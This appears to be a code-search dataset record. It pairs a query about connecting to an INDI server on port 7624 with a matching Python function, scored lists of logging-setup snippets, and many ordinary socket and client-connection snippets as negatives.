f_handler.setFormatter(f_format)\n logger.addHandler(f_handler)\n return logger", "def log(log_directory):\n\n format = \"%(asctime)s %(name)s %(levelname)s [%(module)s.%(funcName)s] %(message)s\"\n datefmt = \"%Y-%m-%d %H:%M:%S\"\n level = 0\n\n # Log to console\n logging.basicConfig(level=level, format=format, datefmt=datefmt, stream=sys.stdout)\n\n # Silence boto errors\n logging.getLogger(\"boto\").setLevel(logging.CRITICAL)\n\n # Log file\n if log_directory is not None:\n filename = \"%s/elastiq.log\" % log_directory\n\n # Try to create log directory and file\n try:\n if not os.path.isdir(log_directory):\n os.makedirs(log_directory, 0755)\n log_file = logging.handlers.RotatingFileHandler(filename, mode=\"a\", maxBytes=1000000, backupCount=30)\n log_file.setLevel(level)\n log_file.setFormatter( logging.Formatter(format, datefmt) )\n logging.getLogger(\"\").addHandler(log_file)\n log_file.doRollover() # rotate immediately\n except Exception, e:\n logging.warning(\"Cannot log to file %s: %s: %s\" % (filename, type(e).__name__, e))\n return None\n else:\n # No log directory\n return None\n\n return filename", "def log_transfer(function, pid, timestamp, timestampend):\n # see if we should log this\n enable = arizonaconfig.get_option(\"enablelogging\")\n logdir = arizonaconfig.get_option(\"logdir\")\n if not enable:\n return\n\n logfile= logdir + \"/\" + get_transfer_log_filename()\n\n # prepare the string\n writeout = function + \" \" + timestamp + \" \" + timestampend + \" \" + pid + \"\\n\"\n\n # try to append to the file\n try:\n tempfile = open(logfile, \"a\")\n tempfile.write(writeout)\n tempfile.close()\n except:\n pass", "def setup_logging(\n level,\n console_level,\n file_level,\n):\n global _LOGGING_INITIALIZED\n if _LOGGING_INITIALIZED:\n logging.debug('SetupLogging: logging system already initialized')\n return\n\n program_name = get_program_name()\n 
logging.addLevelName(LogLevel.DEBUG_VERBOSE, 'DEBUG_VERBOSE')\n logging.addLevelName(LogLevel.ALL, 'ALL')\n\n # Initialize the logging system:\n\n log_formatter = logging.Formatter(\n fmt='%(asctime)s %(levelname)s %(filename)s:%(lineno)s : %(message)s',\n )\n\n log_formatter.formatTime = _format_time\n\n logging.root.handlers.clear()\n logging.root.setLevel(level)\n\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(log_formatter)\n console_handler.setLevel(console_level)\n logging.root.addHandler(console_handler)\n\n # Initialize log dir:\n tstamp = timestamp()\n pid = os.getpid()\n\n if FLAGS.log_dir is None:\n tmp_dir = os.path.join('/tmp', getpass.getuser(), program_name)\n make_dir(tmp_dir)\n FLAGS.log_dir = tempfile.mkdtemp(\n prefix='%s.%d.' % (tstamp, pid),\n dir=tmp_dir)\n\n # Link current log dir to latest:\n latest_path = os.path.join(tmp_dir, \"latest\")\n remove(latest_path)\n os.symlink(src=os.path.basename(FLAGS.log_dir), dst=latest_path)\n\n logging.info('Using log dir: %s', FLAGS.log_dir)\n make_dir(FLAGS.log_dir)\n\n log_file = os.path.join(FLAGS.log_dir, '%s.%s.%d.log' % (program_name, tstamp, pid))\n\n # Link current log file to latest.log:\n latest_path = os.path.join(FLAGS.log_dir, \"latest.log\")\n remove(latest_path)\n os.symlink(src=log_file, dst=latest_path)\n\n file_handler = logging.FileHandler(filename=log_file)\n file_handler.setFormatter(log_formatter)\n file_handler.setLevel(file_level)\n logging.root.addHandler(file_handler)\n\n from base import log\n log.set_logger(log.Logger(level=log.Level.ALL))\n\n _LOGGING_INITIALIZED = True", "def write_log(self, logfile='./src/movement_log.txt'):\n # TODO: parameterize logfile name\n print('Writing logs...')\n f = open(logfile, \"w\")\n for command in self.log_arr:\n f.write(command + \"\\n\")\n print('Writing finished')", "def write_log(*args):\n\n with open(\"server.log\", 'a') as log_file:\n log_file.write(datetime.now().isoformat() + \"\\t\")\n log_file.write(\"\\n\".join(args))\n log_file.write(\"\\n\")", "def setup_logging(filepath=core.ServerConfiguration.LOGDIR,\n log_name='server_process'):\n\n if not os.path.exists(filepath):\n raise IOError('LOG_DIR filepath does not exist: {0:s}'.format(filepath))\n\n if not log_name in core.DEFAULT_LOGGER_PROCESSES:\n raise ValueError('Log_name should be in {0:s}.'\n .format(core.DEFAULT_LOGGER_PROCESSES))\n\n filename = generate_log_filename()\n log_file = os.path.join(filepath, filename)\n\n # configure log formatter\n log_fmt = logging.Formatter('[%(levelname)s][%(asctime)s] %(message)s',\n datefmt='%Y/%m/%d %I:%M:%S %p')\n\n # configure file handler\n file_handler = logging.FileHandler(log_file)\n file_handler.setFormatter(log_fmt)\n\n # stream handler\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(log_fmt)\n\n # setup a server log, add file and stream handlers\n logger = logging.getLogger(log_name)\n logger.addHandler(file_handler)\n logger.addHandler(stream_handler)\n logger.setLevel(logging.DEBUG)\n\n return log_file", "def _logToFile(logsLst, resultJSON=None, logFile=\"logFile.txt\"):\n if not LOGGING_TO_FILE: return\n with open(logFile, \"a+\") as file:\n message = \"\\n\".join(logsLst)\n file.write(\"------------------Logging--------------------\\n\")\n file.write(str(datetime.datetime.now()) + \"\\n\")\n # file.write(str(datetime.datetime.utcnow()) + \"\\n\")\n file.write(\"---------------------------------------------\\n\")\n file.write(message + \"\\n\")\n if resultJSON is not None:\n file.write(\"resulting 
JSON after comparison:\\n\")\n file.write(resultJSON)\n file.write(\"\\n\")", "def config_logger(log_level):\n try:\n logfile = os.path.expanduser(os.path.join(\"~\", \".parallelcluster\", \"awsbatch-cli.log\"))\n logdir = os.path.dirname(logfile)\n os.makedirs(logdir)\n except OSError as e:\n if e.errno == errno.EEXIST and os.path.isdir(logdir):\n pass\n else:\n fail(\"Cannot create log file (%s). Failed with exception: %s\" % (logfile, e))\n\n formatter = logging.Formatter(\"%(asctime)s %(levelname)s [%(module)s:%(funcName)s] %(message)s\")\n\n logfile_handler = RotatingFileHandler(logfile, maxBytes=5 * 1024 * 1024, backupCount=1)\n logfile_handler.setFormatter(formatter)\n\n logger = logging.getLogger(\"awsbatch-cli\")\n logger.addHandler(logfile_handler)\n try:\n logger.setLevel(log_level.upper())\n except (TypeError, ValueError) as e:\n fail(\"Error setting log level. Failed with exception: %s\" % e)\n\n return logger", "def setup_logging(logfile_name=None, do_logging=True, level=logging.DEBUG):\n # pylint: disable-msg=C0111\n if do_logging and logfile_name:\n logging.basicConfig(level=level, filename=logfile_name, filemode=\"w\",\n datefmt='%a, %d %b %Y %H:%M:%S',\n format=\"%(asctime)s %(name)s %(levelname)-8s %(message)s\")\n else:\n class LogSink(object):\n def write(self, *args, **kwargs):\n pass\n def flush(self, *args, **kwargs):\n pass\n logging.basicConfig(stream=LogSink())", "def setup_logging(log_file):\n\tglobal logger\n\tif log_file:\n\t\tlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',filename=log_file,filemode='w',level=logging.INFO)\n\telse:\n\t\tlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',level=logging.INFO)\n\tlogger = logging.getLogger('default')", "def new_custom_log_dir(self) -> str:", "def setup_logging(verbose=True,logfile=None):\n l=logging.getLogger()\n \n l.setLevel(logging.DEBUG if verbose else logging.INFO)\n \n formatter=logging.Formatter(\"[%(asctime)s] %(levelname)-6s %(name)-35s %(message)s \")\n \n if logfile!=None:\n handler=logging.FileHandler(logfile)\n else:\n handler=logging.StreamHandler()\n \n handler.setFormatter(formatter)\n l.addHandler(handler)", "def saveToLogFile(self, msg):\n path = os.path.join(self.parent.progpath, \"logfile.txt\")\n fo = open(path, 'a')\n # prefix with current date and time from now variable\n msg = \"\\n#{0}\\n\".format(datetime.datetime.now()) + msg\n fo.write(msg)\n fo.close()", "def saveToLogFile(self, msg):\n path = os.path.join(self.parent.progpath, \"logfile.txt\")\n fo = open(path, 'a')\n # prefix with current date and time from now variable\n msg = \"\\n#{0}\\n\".format(datetime.datetime.now()) + msg\n fo.write(msg)\n fo.close()", "def setupfilelogging(LogFileName):\n\n Logger = logging.getLogger(LoggerName)\n Logger.setLevel(logging.INFO)\n\n# Create a console log\n\n ConsoleLog = logging.StreamHandler()\n ConsoleLog.setLevel(logging.DEBUG)\n\n# Create a logging format and add to the logging streams\n\n formatter = logging.Formatter(fmt='%(asctime)s - %(levelname)s - %(module)s - %(message)s')\n\n LogFormat = logging.Formatter('%(asctime)s - %(levelname)s - %(module)s - %(message)s')\n ConsoleLog.setFormatter(LogFormat)\n\n# Add the console log stream to the logger\n\n Logger.addHandler(ConsoleLog)\n\n FileLog = logging.FileHandler(LogFileName)\n FileLog.setLevel(logging.DEBUG)\n FileLog.setFormatter(LogFormat)\n\n Logger.addHandler(FileLog)\n\n return Logger", "def init_log(log_instance):\r\n base_dir = os.path.dirname(os.path.abspath(__file__))\r\n log_dir = 
os.path.join(base_dir, \"logs\")\r\n if not os.path.exists(log_dir):\r\n os.makedirs(log_dir)\r\n log_file = log_instance + \"_\" + datetime.datetime.now().strftime(\"%Y-%m-%d\") + \".log\"\r\n logging_conf = {\r\n \"version\": 1,\r\n \"disable_existing_loggers\": False,\r\n \"formatters\": {\r\n \"simple\": {\r\n 'format': '%(asctime)s [%(filename)s:%(lineno)d] [%(levelname)s]- %(message)s'\r\n },\r\n 'standard': {\r\n 'format': '%(asctime)s [%(threadName)s:%(thread)d] [%(filename)s:%(lineno)d] [%(levelname)s]- %(message)s'\r\n },\r\n },\r\n\r\n \"handlers\": {\r\n \"console\": {\r\n \"class\": \"logging.StreamHandler\",\r\n \"level\": \"DEBUG\",\r\n \"formatter\": \"simple\",\r\n \"stream\": \"ext://sys.stdout\"\r\n },\r\n\r\n \"default\": {\r\n \"class\": \"logging.handlers.RotatingFileHandler\",\r\n \"level\": \"DEBUG\",\r\n \"formatter\": \"standard\",\r\n \"filename\": os.path.join(log_dir, log_file),\r\n 'mode': 'w+',\r\n \"maxBytes\": 1024 * 1024 * 5, # 5 MB\r\n \"backupCount\": 20,\r\n \"encoding\": \"utf8\"\r\n },\r\n },\r\n\r\n \"root\": {\r\n 'handlers': ['default', 'console'],\r\n 'level': \"INFO\",\r\n 'propagate': False\r\n }\r\n }\r\n\r\n logging.config.dictConfig(logging_conf)\r\n\r\n # configure application log\r\n return logging.getLogger(log_instance)", "def log_setup():\n logger = logging.getLogger('diskover')\n logger_warn = logging.getLogger('diskover_warn')\n eslogger = logging.getLogger('elasticsearch')\n diskover_eslogger = logging.getLogger('diskover_elasticsearch')\n loglevel = config['logLevel'].get()\n if options.debug:\n loglevel = 'DEBUG'\n if loglevel == 'DEBUG':\n loglevel = logging.DEBUG\n elif loglevel == 'INFO':\n loglevel = logging.INFO\n else:\n loglevel = logging.WARN\n logformat = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n if logtofile:\n # create log file name using top dir names and datestamp\n treedirsstr = ''\n if args:\n n = 1\n dirs = args[0:]\n x = len(dirs)\n for d in dirs:\n if d != '/':\n d = d.rstrip('/')\n treedirsstr += os.path.basename(d)\n if n < x:\n treedirsstr += '_'\n n += 1\n else:\n treedirsstr = os.path.basename(os.getcwd())\n logfiletime = datetime.now().isoformat()\n logname = 'diskover_' + treedirsstr + '_' + logfiletime + '.log'\n logfile = os.path.join(logdir, logname)\n handler_file = logging.FileHandler(logfile)\n handler_file.setFormatter(logging.Formatter(logformat))\n logger.setLevel(loglevel)\n logger.addHandler(handler_file)\n # console logging\n handler_con = logging.StreamHandler()\n handler_con.setFormatter(logging.Formatter(logformat))\n logger.addHandler(handler_con)\n # warnings log\n logname_warn = 'diskover_' + treedirsstr + '_' + logfiletime + '_warnings.log'\n logfile_warn = os.path.join(logdir, logname_warn)\n handler_warnfile = logging.FileHandler(logfile_warn)\n handler_warnfile.setFormatter(logging.Formatter(logformat))\n logger_warn.setLevel(logging.WARN)\n logger_warn.addHandler(handler_warnfile)\n # es logger\n eslogger.setLevel(logging.WARN)\n eslogger.addHandler(handler_file)\n eslogger.addHandler(handler_con)\n # diskover es logger\n diskover_eslogger.setLevel(loglevel)\n diskover_eslogger.addHandler(handler_file)\n diskover_eslogger.addHandler(handler_con)\n else:\n handler_file = None\n handler_warnfile = None\n handler_con = None\n logging.basicConfig(format=logformat, level=loglevel)\n eslogger.setLevel(logging.WARN)\n return logger, logger_warn, loglevel, logformat, \\\n handler_file, handler_warnfile, handler_con", "def write_log(output_dir, texts, new_file=False):\n if 
new_file:\n f = open(os.path.join(output_dir, \"std.log\"), \"w\")\n else:\n f = open(os.path.join(output_dir, \"std.log\"), \"a\")\n f.write(str(texts) + \"\\n\")\n f.close()", "def config_logger(log_cfg_file, experiment_name=None, output_dir='logs'):\n timestr = time.strftime(\"%Y.%m.%d-%H%M%S\")\n exp_full_name = timestr if experiment_name is None else experiment_name + '___' + timestr\n logdir = os.path.join(output_dir, exp_full_name)\n if not os.path.exists(logdir):\n os.makedirs(logdir)\n log_filename = os.path.join(logdir, exp_full_name + '.log')\n if os.path.isfile(log_cfg_file):\n logging.config.fileConfig(log_cfg_file, defaults={'logfilename': log_filename})\n msglogger = logging.getLogger()\n msglogger.logdir = logdir\n msglogger.log_filename = log_filename\n msglogger.info('Log file for this run: ' + os.path.realpath(log_filename))\n\n # Create a symbollic link to the last log file created (for easier access)\n try:\n os.unlink(\"latest_log_file\")\n except FileNotFoundError:\n pass\n try:\n os.unlink(\"latest_log_dir\")\n except FileNotFoundError:\n pass\n try:\n os.symlink(logdir, \"latest_log_dir\")\n os.symlink(log_filename, \"latest_log_file\")\n except OSError:\n msglogger.debug(\"Failed to create symlinks to latest logs\")\n return msglogger", "def logfile():\n\n class Logfile(object):\n def __init__(self, filename, *args, **kwargs):\n super(Logfile, self).__init__(*args, **kwargs)\n self.filename = filename\n self.logs = \"\"\n\n def read(self):\n with open(self.filename) as file:\n for line in file:\n self.logs += line\n return self.logs\n\n yield Logfile(filename=\"gen3tests.logs\")\n\n # cleanup after each use\n if os.path.exists(\"gen3tests.logs\"):\n os.remove(\"gen3tests.logs\")", "def create_logs(self):\n print(\"creating logs...\")\n with open(self.log_file,'w') as log:\n writer = csv.writer(log)\n writer.writerow(['population',\n 'avg_age',\n 'avg_surv',\n 'avg_repro',\n # 'avg_neighbors_1',\n # 'avg_neighbors_2',\n # 'avg_neighbors_3',\n # 'avg_neighbors_4',\n # 'avg_neighbors_5',\n # 'avg_neighbors_6',\n # 'avg_neighbors_7',\n # 'avg_neighbors_8',\n 'number_of_clusters',\n 'clusters_10e1',\n 'clusters_10e2',\n 'clusters_10e3',\n 'clusters_10e4',\n 'clusters_10e5'])\n print(\"Logs created @ {}\".format(self.log_file))", "def create_logger(app_name: str) -> logging.Logger:\n if not os.path.exists(os.path.join(os.getcwd(), 'logs')):\n os.mkdir(os.path.join(os.getcwd(), 'logs'))\n\n app_logfile = os.path.join(os.getcwd(), 'logs', f'{app_name}.log')\n\n logger = logging.getLogger(f\"{app_name}-logger\")\n logger.setLevel(logging.DEBUG)\n\n handler = logging.handlers.RotatingFileHandler(filename=app_logfile, mode='a', maxBytes=20000, backupCount=10)\n handler.setLevel(logging.DEBUG)\n\n # Set the formatter\n formatter = logging.Formatter(\"%(asctime)s | %(levelname)s | %(message)s\", \"%Y-%m-%d %H:%M:%S\")\n handler.setFormatter(formatter)\n\n logger.addHandler(handler)\n\n # Set it as the base handler\n logger.base_handler = handler\n\n # Also add a newline handler to switch to later\n newline_handler = logging.FileHandler(filename=app_logfile, mode='a')\n newline_handler.setLevel(logging.DEBUG)\n newline_handler.setFormatter(logging.Formatter(fmt='')) # Must be an empty format\n \n logger.newline_handler = newline_handler\n\n # Also add the provision for a newline handler using a custom method attribute\n logger.newline = types.MethodType(add_newlines, logger)\n\n # Also add a StreamHandler for printing to stderr\n console_handler = logging.StreamHandler()\n 
formatter = logging.Formatter(\"%(asctime)s | %(levelname)s | %(message)s\", \"%Y-%m-%d %H:%M:%S\")\n console_handler.setFormatter(formatter)\n \n logger.addHandler(console_handler)\n\n return logger", "def create_logger(\n project_name: str,\n level: str = \"INFO\",\n log_dir: str = \"/tmp/logs\",\n file_name: Optional[str] = None,\n do_print: bool = True,\n simple_logging: bool = False,\n log_to_file: bool = False,\n rich_logging: bool = False,\n time_zone: Optional[str] = None,\n):\n import __main__\n\n if file_name is None:\n try:\n file_name = ntpath.basename(__main__.__file__).split(\".\")[0]\n except:\n file_name = \"logs\"\n\n logger = logging.getLogger(file_name)\n logger.handlers.clear()\n logger.setLevel(getattr(logging, level))\n\n if time_zone:\n from pytz import timezone, utc\n def time_formatter(*args):\n # TODO: Doesnt work with rich formatter\n utc_dt = utc.localize(datetime.datetime.utcnow())\n my_tz = timezone(time_zone)\n converted = utc_dt.astimezone(my_tz)\n return converted.timetuple()\n\n logging.Formatter.converter = time_formatter\n\n if rich_logging:\n from rich.logging import RichHandler\n stream_format = f\"{project_name}:%(module)s:%(funcName)s: %(message)s\"\n stream_handler = RichHandler(omit_repeated_times=False)\n else:\n stream_format = f\"%(asctime)s:%(levelname)s:{project_name}:%(module)s:%(funcName)s: %(message)s\"\n stream_handler = logging.StreamHandler()\n\n file_formatter = stream_formatter = logging.Formatter(\n stream_format, \"%Y-%m-%d %H:%M:%S\"\n )\n\n if simple_logging:\n file_formatter = logging.Formatter(\"%(message)s\")\n stream_formatter = logging.Formatter(\"%(message)s\")\n\n if log_to_file:\n date = datetime.date.today()\n date = \"%s-%s-%s\" % (date.day, date.month, date.year)\n log_file_path = os.path.join(log_dir, \"%s-%s.log\" % (file_name, date))\n\n create_folder(log_dir)\n file_handler = logging.FileHandler(log_file_path)\n file_handler.setFormatter(file_formatter)\n logger.addHandler(file_handler)\n\n if do_print:\n stream_handler.setFormatter(stream_formatter)\n logger.addHandler(stream_handler)\n\n logger.propagate = False\n\n return logger" ]
[ "0.77096045", "0.7498354", "0.70676357", "0.7021383", "0.69633764", "0.69220144", "0.6866777", "0.68400943", "0.6803973", "0.6764277", "0.6756204", "0.6751284", "0.6738857", "0.67022955", "0.66923296", "0.66836953", "0.6674281", "0.66629696", "0.6649449", "0.664781", "0.65934724", "0.6592122", "0.65892506", "0.6588697", "0.65575695", "0.6554836", "0.65529484", "0.654721", "0.6547151", "0.6542076", "0.6533464", "0.651822", "0.651507", "0.6510564", "0.6507167", "0.65057844", "0.64957684", "0.6493811", "0.6476424", "0.6472297", "0.6469401", "0.64654124", "0.64590836", "0.6439904", "0.6439229", "0.643861", "0.6433912", "0.64294976", "0.6418758", "0.64175475", "0.64115894", "0.6390008", "0.63821465", "0.6381992", "0.63541514", "0.63531965", "0.6337093", "0.6334821", "0.63253963", "0.6324189", "0.63235635", "0.6317176", "0.6317126", "0.6316617", "0.6316466", "0.631509", "0.63092476", "0.6301707", "0.62920797", "0.6291294", "0.62726796", "0.6269962", "0.6260645", "0.6260045", "0.6256005", "0.62466365", "0.62412286", "0.6223468", "0.6220512", "0.6213147", "0.62019604", "0.6193072", "0.6191967", "0.61735326", "0.61641145", "0.61619073", "0.6158918", "0.61560625", "0.6153982", "0.6152658", "0.6152658", "0.6151933", "0.6148791", "0.61391807", "0.6130558", "0.61299264", "0.6127356", "0.61239386", "0.612246", "0.61168784" ]
0.6588597
24
Establish a TCP connection to the indiserver via port 7624
def connect_to_indi(): indiclient=IndiClient() indiclient.setServer("localhost",7624) # Ensure the indiserver is running if (not(indiclient.connectServer())): print("No indiserver running on "+indiclient.getHost()+":"+str(indiclient.getPort())+" - Try to run") print(" indiserver indi_sx_ccd") sys.exit(1) return indiclient
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def SCPI_sock_connect(ipaddress,port=5025):\n\n try:\n session=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n #session.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 0)\n #session.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, 0)\n session.connect((ipaddress,port))\n except IOError:\n print( \"Failed to connect to the instrument, pleace check your IP address\" )\n return\n return session", "def connect_to_server(self):\r\n self.client_socket.connect((SERVER_IP, SERVER_PORT))\r\n print('[CLIENT] connected to streamer.')", "def connect(self) -> None:\n self.s.connect((self.ip, self.port))", "def connect(self):\n self.socket.connect((\"localhost\",self.PORT_NUM))", "def connect(self):\n sock_version = socket.AF_INET if self.ip_version == 4 else socket.AF_INET6\n with socket.socket(sock_version, socket.SOCK_STREAM) as sock:\n sock.connect((self.server_ip, self.port))\n print(\"Client connected\")\n self.__send_request(\"01\", sock)\n\n while True:\n response = self.__receive_response(sock)\n if len(response) >= 2:\n msg_id_code = int(response[:2])\n if msg_id_code == 2:\n udp_port = self.__request_info_file(response, sock)\n if msg_id_code == 4:\n self.__handle_udp_transfer(self.server_ip, udp_port, sock)\n if msg_id_code == 5:\n print(\"Closing connection\")\n sock.close()\n return 0\n if msg_id_code == 8:\n print(\"Invalid file name. Max size: 15bytes\")\n sock.close()\n return -1", "def make_connection( hostname, port = 4663 ):\n \tconnection = socket.socket();", "def _connect(self):\n hostport = self.getHost()\n channelOpenData = forwarding.packOpen_direct_tcpip((self.host, self.port), (hostport.host, hostport.port))\n self.connector.connection.openChannel(self, channelOpenData)", "def connectToServer(self):\n self.client = Client(base_url = self.server)\n self.ping()", "def connect(self):\n print(\"Connecting\")\n self.socket.connect((self.ip, self.port))\n self.startReading()", "def init_connection(srv_ip, srv_port):\n svrsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n srvaddr = (srv_ip, srv_port)\n svrsock.bind(srvaddr)\n print('Laptop IP:', srv_ip)\n print('Laptop Port:', srv_port)\n svrsock.listen(1)\n print('waiting to be connected...')\n clnsock, clnaddr = svrsock.accept()\n print('\\nconnected!\\n')\n print('IOS IP:', clnaddr[0])\n print('IOS PORT:', clnaddr[1])\n svrsock.settimeout(0)\n clnsock.settimeout(0)\n return svrsock, clnsock, clnaddr", "def opensock(ipaddr,port):\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n s.connect((ipaddr,port))\n \n return s", "def connect(self):\n self.conn.connect()", "def connectToServer(self):\r\n\t\tself.rtspSocket_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\ttry:\r\n\t\t\tself.rtspSocket_client.connect((self.serverAddr, self.serverPort))\r\n\t\texcept:\r\n\t\t\tprint(\"Fail to connect to server\")", "def connect(self, host, port):\n pass", "def open_tcp_port():\n \n # Open an incoming tcp port to access the cluster endpoint\n try:\n vpc = ec2.Vpc(id=myClusterProps['VpcId'])\n defaultSg = list(vpc.security_groups.all())[0]\n print(defaultSg)\n defaultSg.authorize_ingress(\n GroupName=defaultSg.group_name,\n CidrIp='0.0.0.0/0',\n IpProtocol='TCP',\n FromPort=int(DWH_PORT),\n ToPort=int(DWH_PORT)\n )\n except Exception as e:\n print(e)", "def _connect_socket(self):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.connect((self.ip, self.port))\n print(\"Connected to %s at port %d\" % (self.ip, self.port))", "def init_connexion():\n connexion = socket(AF_INET, 
SOCK_STREAM)\n connexion.bind((hote, port))\n\n return connexion", "def start(self):\n self.port = self.conn.evalInServer(server_code.format(key=self.key))", "def establish_connection(self):\n print('Listening...')\n self.socket.listen()\n self.conn, addr = self.socket.accept()\n print('Received connection', addr)", "def start(self):\n # create socket\n try:\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # 10 minutes for timeout\n self._socket.settimeout(600)\n except socket.error as msg:\n logging.error(\"Can't create socket. Error code: {}, msg: {}\".format(*msg))\n raise\n\n # Open TCP connection\n try:\n self._socket.connect(self.address)\n except socket.error:\n logging.error(\"Can't connect to the server on {}:{}\".format(*self.address))\n raise", "def connect(self):\n self.ipv4 = socket.gethostbyname(socket.gethostname())\n self.addr = (self.ipv4, HttpServer.PORT)\n self.server.bind(self.addr)\n print(\"[SETUP] server bound to IPv4 address\", self.ipv4, \"on port\", HttpServer.PORT)\n self.server.listen()\n print(\"[SETUP] server listening for connections\")", "def connect(self):\n self.sock = s.socket(s.AF_INET,s.SOCK_STREAM)\n self.sock.connect((self.remote_host,\n self.remote_port))", "def connect(self, addr):\n self._outbound = True\n rules = firewall.DefaultRule()\n self._state = SocketState(self._got_remote)\n self._endpoint = SocketEndpoint(rules, None)\n self._i2cp = client.Connection(self._endpoint)\n self._i2cp.open()\n while not self._state.is_connected():\n time.sleep(0.1)", "def open(self):\n try:\n if self.verbose:\n print \"Trying to open connection to Leica at \",self.IP_address,\":\",str(self.port)\n self.leicasocket = socket.socket()\n self.leicasocket.connect((self.IP_address,self.port))\n if self.verbose:\n print(\"Connected.\")\n self.connected=True\n return True\n except:\n if self.verbose:\n print \"Error opening connection to \", self.IP_address\n self.connected=False\n return False", "def connect(self) -> None:\n self.client_socket.connect((self.server_name, self.server_port))", "def connect(self):\n\n print(\"Connecting to server at {}:{}\".format(self.hostname, self.port))\n\n self._sock = socket.socket()\n self._sock.setblocking(True)\n self._sock.connect((self.hostname, self.port))\n self._sockfile = self._sock.makefile(encoding=\"utf-8\")\n self._connected = True\n\n if self.password:\n self._sendmsg(\"PASS :{}\".format(self.password))\n self._sendmsg(\"NICK {}\".format(self.nickname))\n self._sendmsg(\"USER {} 0 * :ORE Utility Bot\".format(getpass.getuser()))\n if self.ident_password:\n self._sendmsg(\"PRIVMSG NickServ :identify {}\".format(\n self.ident_password))\n self._sendmsg(\"JOIN {}\".format(\",\".join(self.channels)))", "def connect(self):\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.connect((self.host, PORT)) # probably throws errors\n self.connected = True", "def connect_to_server(self):\n\n try:\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.connect((self.hostname, self.port))\n return client\n except Exception as e:\n print(\"Can't connect to server: \", e)\n sys.exit()", "def connect(self):\n self.client.connect(self.host, self.port)\n self.client.loop_forever()", "def _initRemoteMDSConnection(shotno):\n\tconn = _mds.Connection(_pref._HBT_SERVER_ADDRESS+':8003');\n\tconn.openTree('hbtep2', shotno);\n\treturn conn", "def connect(self) -> None:\n self.terminate()\n self._new_client().connect(\n hostname=self.ip,\n port=self.port,\n username=self.username,\n 
password=self.password,\n look_for_keys=False,\n allow_agent=False)", "def _connect(self):\r\n self.sock = socket.socket()\r\n host = \"pubsub.pubnub.com\"\r\n port = 80\r\n if self.use_ssl:\r\n self.sock = ssl.wrap_socket(self.sock)\r\n port = 443\r\n self.sock.connect((host, port))\r\n self.connected = True", "def openSocket():\n sock = socket.socket()\n sock.settimeout(2)\n sock.connect((IRC_HOST, IRC_PORT))\n sock.send(\"PASS {}\\r\\n\".format(priv.PASS).encode(\"utf-8\"))\n sock.send(\"NICK {}\\r\\n\".format(priv.NICK).encode(\"utf-8\"))\n\n sock.send(\"CAP REQ :twitch.tv/membership\\r\\n\".encode(\"utf-8\"))\n sock.send(\"CAP REQ :twitch.tv/tags\\r\\n\".encode(\"utf-8\"))\n sock.send(\"CAP REQ :twitch.tv/commands\\r\\n\".encode(\"utf-8\"))\n\n return sock", "def connect_to_server(self):\n\t\tself.outside.start()\n\t\tself.outside.register(self.config.server_ip, self.config.server_port)\n\n\t\tself.thin.start()\n\t\tself.thin.register(self.config.server_ip, self.config.server_port)", "def connect(self):\n self.sock = socket.socket()\n self.sock.connect(self.addr)\n self.send(\"PASS {}\".format(self.password))\n self.send(\"NICK {}\".format(self.nick))\n self.send(\"JOIN {}\".format(self.channel))\n self.send(\"CAP REQ :twitch.tv/tags\")\n self.is_connected = True\n # TODO: error handling", "def connect(self):\r\n try:\r\n self.host_win_ip = \"http://\" + self.host_ip + \":5985/wsman\"\r\n self.conn = Protocol(\r\n endpoint=self.host_win_ip,\r\n transport=\"ntlm\",\r\n username=self.usr,\r\n password=self.pwd,\r\n server_cert_validation=\"ignore\")\r\n logger.warn(\"Connecting Windows ...\")\r\n self.shell_id = self.conn.open_shell()\r\n logger.warn(self.shell_id)\r\n logger.warn('Connected to Windows.')\r\n except Exception as error:\r\n msg_exception_error = \"Exception raised: %s \" % error\r\n raise(msg_exception_error)", "def connect():", "def _open(self):\n \n # Open Device\n try:\n logger.debug(\"%s: TCP port opening started...\" % \\\n self.__class__.__name__)\n errno = 115\n while errno == 115:\n try:\n self._tcp_socket.connect(self._addr)\n errno = 0\n except socket.error as fx:\n if fx.args[0] != 115:\n raise fx\n self._socket = HorizonTransport_Socket(sock = self._tcp_socket,\n host = self._addr[0],\n port = self._addr[1],\n name = \"%s:%d\" % self._addr,\n encryption =self._encryption,\n key = self._key,\n store_timeout = self.store_timeout,\n version = self.version)\n self._socket.opened = True\n logger.debug(\"%s: ...TCP port opening complete.\" % \\\n self.__class__.__name__)\n \n # Open failed\n except Exception as ex:\n logger.error(\"%s: ...TCP port opening failed:\\n%s\" % \\\n (self.__class__.__name__, str(ex)))\n raise utils.TransportError \\\n (\"TCP Port open failed!\\n\" + str(ex))", "def start(self):\n self.protocol.makeConnection(self.transport)", "def start(self):\n self.protocol.makeConnection(self.transport)", "def telnet(self):\n self.log.info(\"connect-via-telnet\")\n telnet = distutils.spawn.find_executable(\"telnet\")\n os.execv(telnet, (\"telnet\", \"localhost\", str(self.qemu.monitor_port)))", "def Connect(self):\r\n #sleep(1)\r\n #self.src_ref = randint(1, 20)\r\n self.src_ref = 10\r\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.s.settimeout(self.timeout)\r\n self.s.connect((self.ip, self.port))\r\n self.s.send(TPKTPacket(COTPConnectionPacket(self.dst_ref,\r\n self.src_ref,\r\n self.dst_tsap,\r\n self.src_tsap,\r\n 0x0a)).pack())\r\n reply = self.s.recv(1024)\r\n _ = 
